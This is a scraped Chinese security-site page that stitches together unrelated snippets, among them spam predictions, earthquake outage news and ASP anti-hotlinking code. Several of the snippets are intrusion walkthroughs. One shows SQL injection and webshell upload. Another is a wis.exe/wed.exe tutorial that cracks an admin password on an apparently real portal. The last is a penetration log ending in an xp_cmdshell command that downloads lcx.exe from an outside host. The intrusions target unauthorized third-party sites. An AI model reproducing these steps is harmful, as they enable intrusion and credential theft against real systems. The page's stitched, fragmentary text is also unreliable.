对于2007年,我们抱有太多的幻想,同样也表现出了众多的担忧,特别是在安全领域。那么,谁将在2007年发现Windows Vista操作系统的首个安全漏洞呢?是不是在发现漏洞的当天,就出现零天攻击呢?
对于2007年,我们抱有太多的幻想,同样也表现出了众多的担忧,特别是在安全领域。那么,谁将在2007年发现Windows Vista操作系统的首个安全漏洞呢?是不是在发现漏洞的当天,就出现零天攻击呢?我们是否能再次见到到处横行的僵尸网络呢?垃圾邮件是不是还会泛滥成灾呢?谁又将通过钓鱼软件把你的信用卡数据钓走呢?众多不确定的因素,等待我们去见证。
但可以肯定的一点是,安全新闻在2007年将会屡屡出现在各大媒体的头条上,这是我们完全可以预见的。另外,在安全领域,随着Rootkit的出现,给我们造成了很大的麻烦,所以在2007年安全专家将深入展开对Rootkit的研究,以及如何对Rootkit进行防范。
垃圾邮件的大预言
对于2007年的安全领域,众人早已开始了他们大胆的预测。在这些预测当中,最不可能成为现实的是SecureWorks公司恶意软件调查员Jon Stewart关于垃圾邮件的预测。Stewart表示,如果垃圾邮件散布者要维持他们的收益,必须发展,且找到新的攻击技术。
Stewart认为,垃圾电子邮件将会在2007年逐渐减少,除非垃圾邮件散布者能够找到新的诡计以骗过功能强大的Windows Vista操作系统和已经改进的现有反垃圾邮件技术和技巧。不然的话,垃圾邮件将会出现不“景气”的情形。
“Windows Vista操作系统将会迫使垃圾邮件散布者铤而走险,采用社会工程攻击的手段。但由于微软将加大在反病毒和安全计算领域的研发力度,所以,在以后的日子里,垃圾邮件生存的空间将变得越来越小。”Stewart表示。
“导致垃圾邮件难以生存的另一个极大的因素是预计在2006年12月发布的SpamHaus PBL发垃圾邮件工具。”Stewart补充道。
PBL是一种非常有力的反垃圾邮件工具,让终端用户可以更好来清除垃圾邮件的地址。比如有一些网络用户,他们的电子邮件是值得信任的,对于一些好的IP地址,PBL会对它们加以确认。当然在这个过程当中,实际上是有来自中国的一些ISP和一些来自世界各地的ISP跟我们一起合作才取得这样的效果。
“由于垃圾邮件散布者主要是依赖那些拨号上网,以及基于DHCP的宽带连接,所以都在SpamHaus的阻挡清单里。只要分布式的采用PBL,就能有效地阻挡垃圾邮件在互联网上的横行。”Stewart称。
但Stewart马上又反过来表示,由于通过垃圾邮件能够产生巨大的利益,所以垃圾邮件散布者肯定会想尽办法来躲过反垃圾邮件工具。
“由于反垃圾邮件工具的逐步完善,垃圾邮件散布者将会被迫使采用这种路径进行垃圾邮件散步,通过用户的ISP邮件服务器发送邮件,或是尽可能的寻找静态主机,这样也能达到发送邮件的目的。但通常情况下,第一种途径并不见得十分有效,因为ISP也会越来越聪明,他们会让邮件服务器变得越来越难被利用。”Stewart表示。
但Stewart表示,第二种途径却相当难对付,因为这些在线的主机在很大程度上就是一些虚拟的服务器,主要是被租用来为主机商业网站和邮件服务器服务。
虽然 LAMP 组合很不错,但是如果想要架设一台同时支持 PHP、ASP、ASP.NET、JSP、Perl 的 Web 虚拟主机服务器,还是用 Windows 2003 的 IIS 6 最好。网上有很多介绍在 IIS 6 上配置 PHP 的文章,但是那些方法不是性能不好,就是升级麻烦。下面的方法可以让你在第一次配置好后,能够非常方便的进行升级。
这里所说的升级,是指从某个 php4 版本升级到另一个…
from;网络
一、踩点
ping www.xxx.com 发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。
二、注入
从源文件里搜索关键字asp,找到了一个注入点。用nbsi注入,发现是sa口令登陆,去加了一个用户,显示命令完成。哈哈,看来管理员太粗心了。先上传一个webshell,上传了一个老兵的asp木马,接下来的就是个人习惯了,我平时入侵的习惯是先上传webshell,然后再把webshell提升为system权限,因为这样说可以说在入侵之时会非常的方便,我个人觉得这个方法非常好。
三、提升权限
先看哪些特权的:
cscript C:\Inetpub\AdminScripts\adsutil.vbs get /W3SVC/InProcessIsapiApps
得到:
Microsoft (R) Windows 脚本宿主版本 5.1 for Windows版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.InProcessIsapiApps : (LIST)…
from:网络
本文是一篇安全技术顾问的手记,并没有发表过,文中所谈到的是整个黑客、红客及安全技术联盟存在的问题,因为小榕在这当中的特殊地位,所以本文以小榕为一个评论点。然而,作者真正想让读者关心的是在文中谈及事件所说明的问题,而不是要激起读者对小榕个人的不满,所以本文绝对不是对小榕个人攻击的文章,而是一篇希望激起大家对中国网络安全深思的文章! Internet从它在中国出现的那一刻算起到今天已有十几年的历史了,在这期间,IT产业从萌发到飞速发展再到今天一片萧条几乎破产,可谓饱经风霜了。而在网络世界里的另一批人也可谓几经变革,他们的名字叫做“黑客”。这个名字最早丝毫没有贬义的意思,它是指那些对网络有相当了解的计算机技术人才,他们可以在必要的时候从别人的系统中得到自己想要的东西,这与今天的恶意攻击者完全不同,可是在中国也不知道是怎么的渐渐的黑客就与恶意攻击者画了等号。 言归正传,无论是夕日的“绿色兵团”还是今天的“红客联盟”。一说到小榕的名字,可谓无人不知,无人不晓。小榕无疑已经成为中国黑客或是红客界的代表人物之一。几年来,小榕也算是得到了不少的鲜花和掌声。支持者之多只要看看小榕的个人网站的浏览量就知道了。可是,有谁真正静下心来,仔细想过小榕都做了些什么呢?他做的事真的如红客们说的那样是一起在为中国的网络安全而努力吗?也许你想过,也许你没有,但是无论怎样,请先听听我个人的一点愚见。小榕等一类人,他们在现实中在做什么,我并不了解,可能也是安全顾问之类。然而,他们在网络上在做什么,我是看见的。如果小榕他们真的是在为网络安全而努力,那么他的个人网站就应该是一个有利于培养网络安全工程师的网站,只有当中国有更多的网络安全工程师的时候,中国的网络才可以谈安全,而不是更多的黑客。 那么作为一个真正的安全技术网站应该做到什么呢?来看看专业的安全人士是怎么说的: ①、 网站上必须有网络安全教程的下载及一些发现被攻击时的具体解决方案; ②、 详细介绍防火墙的原理及实现; ③、 给出安全软件的编写策略及原码(可以是部分); ④、 即使给出一些攻击性软件,也应该指出是用于安全漏洞测试的,最重要的是应该同时具体的攻击原理,最好同时有防卫方案及防卫原理介绍,而且对防卫软件的介绍应该更加的具体。 以上四点才是一个网络安全网站应该做的。但是,小榕的个人网站做到了多少呢?人们在他的网站上看见的是大量最新最好的攻击性软件及使用方法介绍供人下载,并且指出是菜鸟一看就懂,立刻上手,但是却丝毫不给出防御的措施,就算不给,给出攻击原理也好啊,至少敏感的网络安全人士会立刻给出解决方案,这样可以缩短安全软件的开发周期。但是这也极少看见,或是无关痛痒的略点一二。根本是对网络安全不负责任。唯一看上去好象算负责的就是那句“劝告大家不要用本网站提供的软件攻击他人”,但是这样的话有什么用呢?有时反而更容易激起人们的兴趣。至于提供安全教程下载要么根本没有要么就是名字这样叫内容还是攻击教程,这一点我不说,网民应该可以感觉到的。当然有时到是可以看见安全防卫软件的下载,也是十分陈旧的。就好象武器店卖的是雪亮崭新的矛却卖锈迹斑斑的盾。 这样造成的后果是什么呢?“盾”老化了的已经不能用了,安于防守,必然一败涂地,结果是所有的人一涌而上,打着“维护中国网络安全”的大旗,在网络上展开拼杀,并自称是变被动为主动,以攻击代替防守,而自己的防御系统没有什么改进,一旦中拳也是很痛的,这就象小孩子打架,结果使得网络上一旦展开黑客大战往往两败俱伤,谁赢只是看谁先攻击罢了,可悲,可叹啊!但是作为网络工程师希望造成的不是这样的氛围。我们希望网络上到处都是身着铠甲,一手持盾,一手拿矛的甲士。在受攻击时可以做到足够的防卫,并给对方警告,在对方顽固不化时,才用矛给予教训,而在任何情况下不主动攻击他人,这才是仁者之风,才是网络应有的气氛,要有这样的气氛,网络可供下载的应该是最好的盾和必要的矛,不是现在这样的。 现在再来看看所谓的网络安全论坛,有很多人认为这样的形式很好,大家可以交流经验,但是就靠这个是远远不够的,诚然现在的安全论坛分类详细,条目繁多,但是它的缺点也是很多的。这里说最大的三点: 首先,论坛即使提到安全问题,也是零零星星的,很难系统化,自然对安全意识的推广十分不利,而且问题提出了,回答也是少有着边际的,即使很有水平的人,回答的正确的也只是告诉你去装什么软件,少有谈及理论之人,也许是自己用来吃饭的技术不便传人吧; 其次,论坛上灌水之人众多,真正懂技术的人太少了,很多人只是在某某电脑杂志上看见有关黑客的文章就上传,甚至随便抓一篇就是,可能是连自己也看不懂的文章。上传只是为了多骗些经验值,让更多的菜鸟崇拜自己,这样的文章往往没有什么价值,反而浪费很多人的时间去看; 再次,就是网管自己管理不到位,很多过期的毫无价值的东西,可以删的就删了它,这样以避免长期积累一个论坛多达数十上百页,新来的人不知道看什么。 当然这样还有一个问题,什么是没有价值的东西?这一点很多网管往往误解我们的意思,他们会认为在网上放了半年或是一年的东西,很多人看过了,就没有价值了,就可以删了,这样往往造成想“CEO是什么?”,“ISDN是什么?”,“ADSL是什么?”等等这些对初学者是永远有用的,而且是新手们特别想问的问题,而要新手们每次都问一边这样的问题无疑那些自以为是老鸟的人又会笑他们无知,这样使得新手的入门变的比提高更难,所以对于这样的问题就应该一直在网络上。 上面说的种种问题,归一下就是象小榕这样有关安全技术的网站,应该提供的知识(网络安全知识)没有提供,甚至是提供了相反的知识(黑客攻击知识)。已经提供的服务(安全技术论坛)又办的十分糟糕。结果使人们想在网络上找到有关网络安全的知识来保护自己变的很困难,往往最多是在受攻击后在求救,还不一定有救。而这样的网络提供的服务却使那些对网络略知一二的人很容易找到攻击别人的方法,软件及实例。可谓全套服务。这样就培养了一大批恶意的攻击者,给网络增加了危险,给国家带来了损失。同样的问题不只在小榕网站,红客联盟中国网络安全技术联盟也一样。有时甚至提供攻击教程的下载。根本就成为一个培养黑客的网站。…
说起流光、溯雪、乱刀,可以说是大名鼎鼎无人不知无人不晓,这些都是小榕哥的作品。每次一提起小榕哥来,我的崇拜景仰就如滔滔江水,连绵不绝~~~~(又来了!) 让我们崇拜的小榕哥最新又发布了SQL注入工具,这回喜欢利用SQL注入入侵网站的黑友们有福了。小榕哥的工具就是强!偶用它来搞定我们本地的信息港,从寻找注入漏洞到注入攻击成功,通过准确计时,总共只用了3分还差40秒,呵呵,王者风范,就是强啊!不信吗?看看我的入侵过程吧。
一、下载榕哥的工具包 小榕哥的这个SQL注入攻击工具包在榕哥的站点http://www.netxeyes.com/main.html可以下载到,不过这个工具太火爆了,下载的人实在太多,你觉得慢的话,可以到其它大的黑软站点搜索一下,绝对可以找到的。 下载来的这个工具包中总有两个小程序:"wed.exe"和"wis.exe",其中"wis.exe"是用来扫描某个站点中是否存在SQL注入漏洞的;"wed.exe"则是用来破解SQL注入用户名密码的。两个工具的使用都非常简单,结合起来,就可以完成从寻找注入点到注入攻击完成的整个过程。
二、寻找SQL注入点 "wis.exe"使用的格式如下:"wis.exe 网址",这里以笔者检测本地信息港为例:首先打开命令提示窗口,输入如下命令:"wis.exe http://www.as.***.cn/"(如图1)。
小提示:在输入网址时,前面的"http://";和最后面的"/"是必不可少的,否则将会提示无法进行扫描。
输入完毕后回车,即可开始进行扫描了。很快得到了扫描结果,可以看到这个网站中存在着很多SQL注入漏洞(如图2),我们随便挑其中一个来做试验,就挑"/rjz/sort.asp?classid=1"吧。
打开浏览器,在地址栏中输入"http://www.as.***.cn/rjz/sort.asp?classid=1",打开了网站页面,呵呵,原来是一个下载网页(如图3)。现在来对它进行SQL注入,破解出管理员的帐号来吧!
三、SQL注入破解管理员帐号 现在进入命令窗口中,使用刚才下载的工具包中的"wed.exe"程序,命令使用格式为:"wed.exe 网址"输入如下命令:"wed.exe http://www.as.***.cn/rjz/sort.asp?classid=1"。回车后可看到命令运行情况(如图4)。
小提示:这次输入网址时,最后面千万不要加上那个"/",但前面的"http://";头也还是必不可少的。
可以看到程序自动打开了工具包中的几个文件,"C:\wed\wed\TableName.dic"、"C:\wed\wed\ UserField.dic"和"C:\wed\wed\PassField.dic",这几个文件分别是用来破解用户数据库中的字表名、用户名和用户密码所需的字典文件。当然我们也可以用其它的工具来生成字典文件,不过想想小榕哥以前出的"黑客字典"那么的强大,还用得着去多此一举吗? 在破解过程中还可以看到"SQL Injection Detected."的字符串字样,表示程序还会对需要注入破解的网站进行一次检测,看看是否存在SQL注入漏洞,成功后才开始猜测用户名。 开始等待吧!呵呵,很快就获得了数据库表名"admin",然后得到用户表名和字长,为"username"和"6";再检测到密码表名和字长,为 "password"和"8"(如图5)。看来用户的密码还起得挺长的呢,如果手工破解出这个用户密码来,一定要花上不少时间的!
正想着手工注入会有多困难时,"wed.exe"程序已经开始了用户名和密码的破解。很快的,就得到了用户名和密码了——"admina"、"pbk&7*8r"(如图6)!天啦,这也太容易了吧!还不到一分钟呢
四、搜索隐藏的管理登录页面 重新回到刚才的软件下载页面中,任意点击了一个软件下载链接,哎呀?怎么可以随便下载的呢!不像以前碰到的收费网站,要输入用户名和密码才可以下载。看来这是免费下载的网站,我猜错了攻击对象,不过既然都来了,就看看有没有什么可利用的吧? 拿到了管理员的帐号,现在看来我们只有找到管理员登录管理的入口才行了。在网页上找遍了也没有看到什么管理员的入口链接,看来还是得让榕哥出手啦! 再次拿出"wis.exe"程序,这个程序除了可以扫描出网站中存在的所有SQL注入点外,还可以找到隐藏的管理员登录页面。在命令窗口中输入"wis.exe http://www.as.***.cn/rjz/sort.asp?classid=1/ /a"(如图7)。注意这里输入了一个隐藏的参数"/a"。
怎么会扫描不成功呢?呵呵,原来这是扫描注入点,当然不能成功了,管理员登录页面只可能隐藏在整个网站的某个路径下。于是输入"wis.exe http://www.as.***.cn/ /a",对整个网站进行扫描。注意扫描语句中网址的格式。程序开始对网站中的登录页面进行扫描,在扫描过程中,找到的隐藏登录页面会在屏幕上以红色进行显示。很快就查找完了,在最后以列表显示在命令窗口中。可以看到列表中有多个以"/rjz/"开头的登录页面网址,包括 "/rjz/gl/manage.asp"、"/rjz/gl/login.asp"、"/rjz/gl/admin1.asp"等。就挑 "/rjz/gl/admin1.asp"吧,反正这些都是管理员登录的页面想用哪个都可以。 在浏览器中输入网址" http://www.as.***.cn/rjz/gl/admin1.asp",呵呵,出现了本来隐藏着的管理员登录页面(如图8)。输入用户名和密码,就进入到后台管理系统,进来了做些什么呢?当然不能搞破坏啦,看到有一个添加公告的地方,好啊,就在这儿给管理员留下一点小小的通知吧!
如果我们知道一个静态文件的实际路径如:http://www.xx.com/download/51windows.pdf,如果服务器没有作特别的限制设置,我们就可以毫不费力的把它下载下来!当网站提供51windows.pdf下载时,怎么样才能让下载者无法得到他的实际路径呢!本文就来介绍如何使用Asp来隐藏文件的实际下载路径。
我们在管理网站文件时,可以把扩展名一样的文件放在同一个目录下,起一个比较特别名字,例如放pdf文件目录为the_pdf_file_s,把下面代码另存为down.asp,他的网上路径为http: //www.xx.com/down.asp,我们就可以用http://www.xx.com/down.asp?FileName= 51windows.pdf来下载这个文件了,而且下载者无法看到这个文件实际下载路径的!在down.asp中我们还可以设置下载文件是否需要登陆,判断下载的来源页是否为外部网站,从而可以做到防止文件被盗链。
以下是引用片段:<% From_url = Cstr(Request.ServerVariables("HTTP_REFERER")) Serv_url = Cstr(Request.ServerVariables("SERVER_NAME")) if mid(From_url,8,len(Serv_url)) <> Serv_url then response.write "非法链接!" '防止盗链 response.end end if…
摘要:赛门铁克尚未出台应对病毒库不能更新的解决方案,暂时也没有将服务器移到国内或者借用其它网站服务器升级的意向. 受台湾地震波及,国外杀毒软件厂商的病毒库暂时之内不能顺常升级.卡巴斯基已于近日快速地推出了应急升级方案,而美国杀毒软件厂商赛门铁克的反应速度显然慢了一些.赛门铁克公关部门负责人称,赛门铁克尚未出台应对病毒库不能更新的解决方案,暂时也没有将服务器移到国内或者借用其它网站服务器升级的意向.
另外,赛门铁克方面也表示正在积极解决此事.赛门铁克透露:赛门铁克已经部署了有经验的技术队伍来帮助客户解决在此期间可能出现的不便和问题;赛门铁克还将对此继续密切关注,在互联网服务全面恢复前,如果有客户遇到任何问题,可以拨打技术支持电话(800 810 3992)与赛门铁克的本地技术支持部门取得联系.
根据香港电讯局29日发布的最新情况报告,初步勘探显示,台湾地震造成的海底光缆损毁相当严重,预计修复时间比原先估计的5至7日要长。目前,香港通讯服务仍受到影响。
香港电讯局表示,部分海底光缆维修船28日已经抵达现场,但恶劣的天气阻碍了勘探和评估工作。
目前,香港打往台湾地区的直拨电话及漫游服务已恢复到正常水平的一半,预计30日将恢复正常。香港拨往韩国的国际直拨电话及漫游服务仍然拥堵。使用电话卡由海外致电香港仍然严重拥堵。
电讯局表示,在数据服务方面,互联网访问整体上有所改善,但大部分用户仍有访问速度缓慢的问题。香港本地的电信服务以及与内地和澳门的通讯均已正常。
随着人们对信息安全管理的理解和历史经验的积累,安全网络的体系架构在我们的脑海中越发清晰。随着时间的推移,我们经历了从基本的主机加固阶段、到后来的网络认证阶段,直到将行为管理也纳入安全的范畴,这些演变的过程不仅仅是为了避免恶意攻击,更主要目的是提高网络的可信度,也增强我们的凝聚力。 一、 安全过渡即将完成 经过多年的摸索以及厂商对于安全产品的更加合理化的追求,我们预计安全防御体系和安全产品市场会从这个三个方面出现变革:“被动防御”向“主动防御”过渡;“产品叠加型”向“以策略管理型”过渡;安全产品从“单一形式”向“集中管理(UTM)”过渡。总之,联动性的安全产品和更加实用的解决方案会给用户带来益处。 …
作者:凋凌玫瑰[N.C.P.H]信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
这是前天我写于我blog的一篇文章,是一种传统的渗透方法,没有什么新的技术,但我觉得思路有必要给大家分享一下,还有一点就是实现了pcanywhere的cif文件替换登录.
前几天搞一个台湾一个排名两千多的站点,花费了不少时间,本以为是没戏的了,结果今天上肉机一看,跑了一周多的hash竟然跑了出来.然后接着搞了下去. 最重要的经验就是我们要有一个思想:管理员怎么进去的,我们就怎么进去. 这个站的渗透也比较慢长,花了一周多的样子.网站很偏僻的地方存在一个注入点,是db权限的,很遗憾不是sa的,但是不能列目录,还好可以猜解管理员的密码,在adminlogin表中得到了管理员的密码:1qaz3edc@22$够复杂,登录后台,不能直接上传,在上传图片的地方抓包,然后利用截断字符改包上传,得到一个asp木马. 得到的是一个主站的webshell,但是权限很低,没有修改权限,主站服务器只开了一个80和5631,可能文件传输也是通过5631传输的,有pcanywhere好,原以为有戏,可把host目录中的cif文件下下来用破解器打开一个,用户名和密码都是乱码,遇到过很多这种情况,我也搞不懂原因.可能是它的用户名用了繁体字的原因吧. 试着上传一个知道用户名和密码的cif文件到host目录下,可还是不行,以前没试过,但听说行的,只得试试了,试了好久还是用我这个传上去的cif文件的用户名和密码登不进.索性把它的给删了,把我传上去的cif 文件名改成他的文件名,ok,pcanywhere第一次连接出错,再次连接,连接成功,但对方服务器使用的是win2003,桌面被锁定,还需要 windows系统的用户名和密码才可以登录.这里就卡起了,怎么找到系统的用户名和密码?我利用得到的密码变了很多方式去猜了一下,都猜不出来系统的登录密码. 我漫无目的的在webshell里逛,便去看了看它的数据库连接用户名和密码是什么,因为管理员很多时候密码是一样的.但很失望, conn.asp里面的连接是连到192.168.0.10里面的,用户名是xxxweb,密码是xxxweb@10abcd123,得到个密码也好,很显示数据库是连的内网中的另一台服务器.便把这个密码用来试了一下系统密码,也不是,登不进去. 有可能数据库服务器的sa用户用的也是这个密码,在webshell上用sqledit连接这个数据库服务器的sa用户,密码用得到的这个密码,连接成功,还好,有机会把这台数据库服务器拿下来了. 执行命令:exec master..xp_cmdshell 'echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://www.ncph.net/lcx.exe^",0:xPost.Send():Set sGet…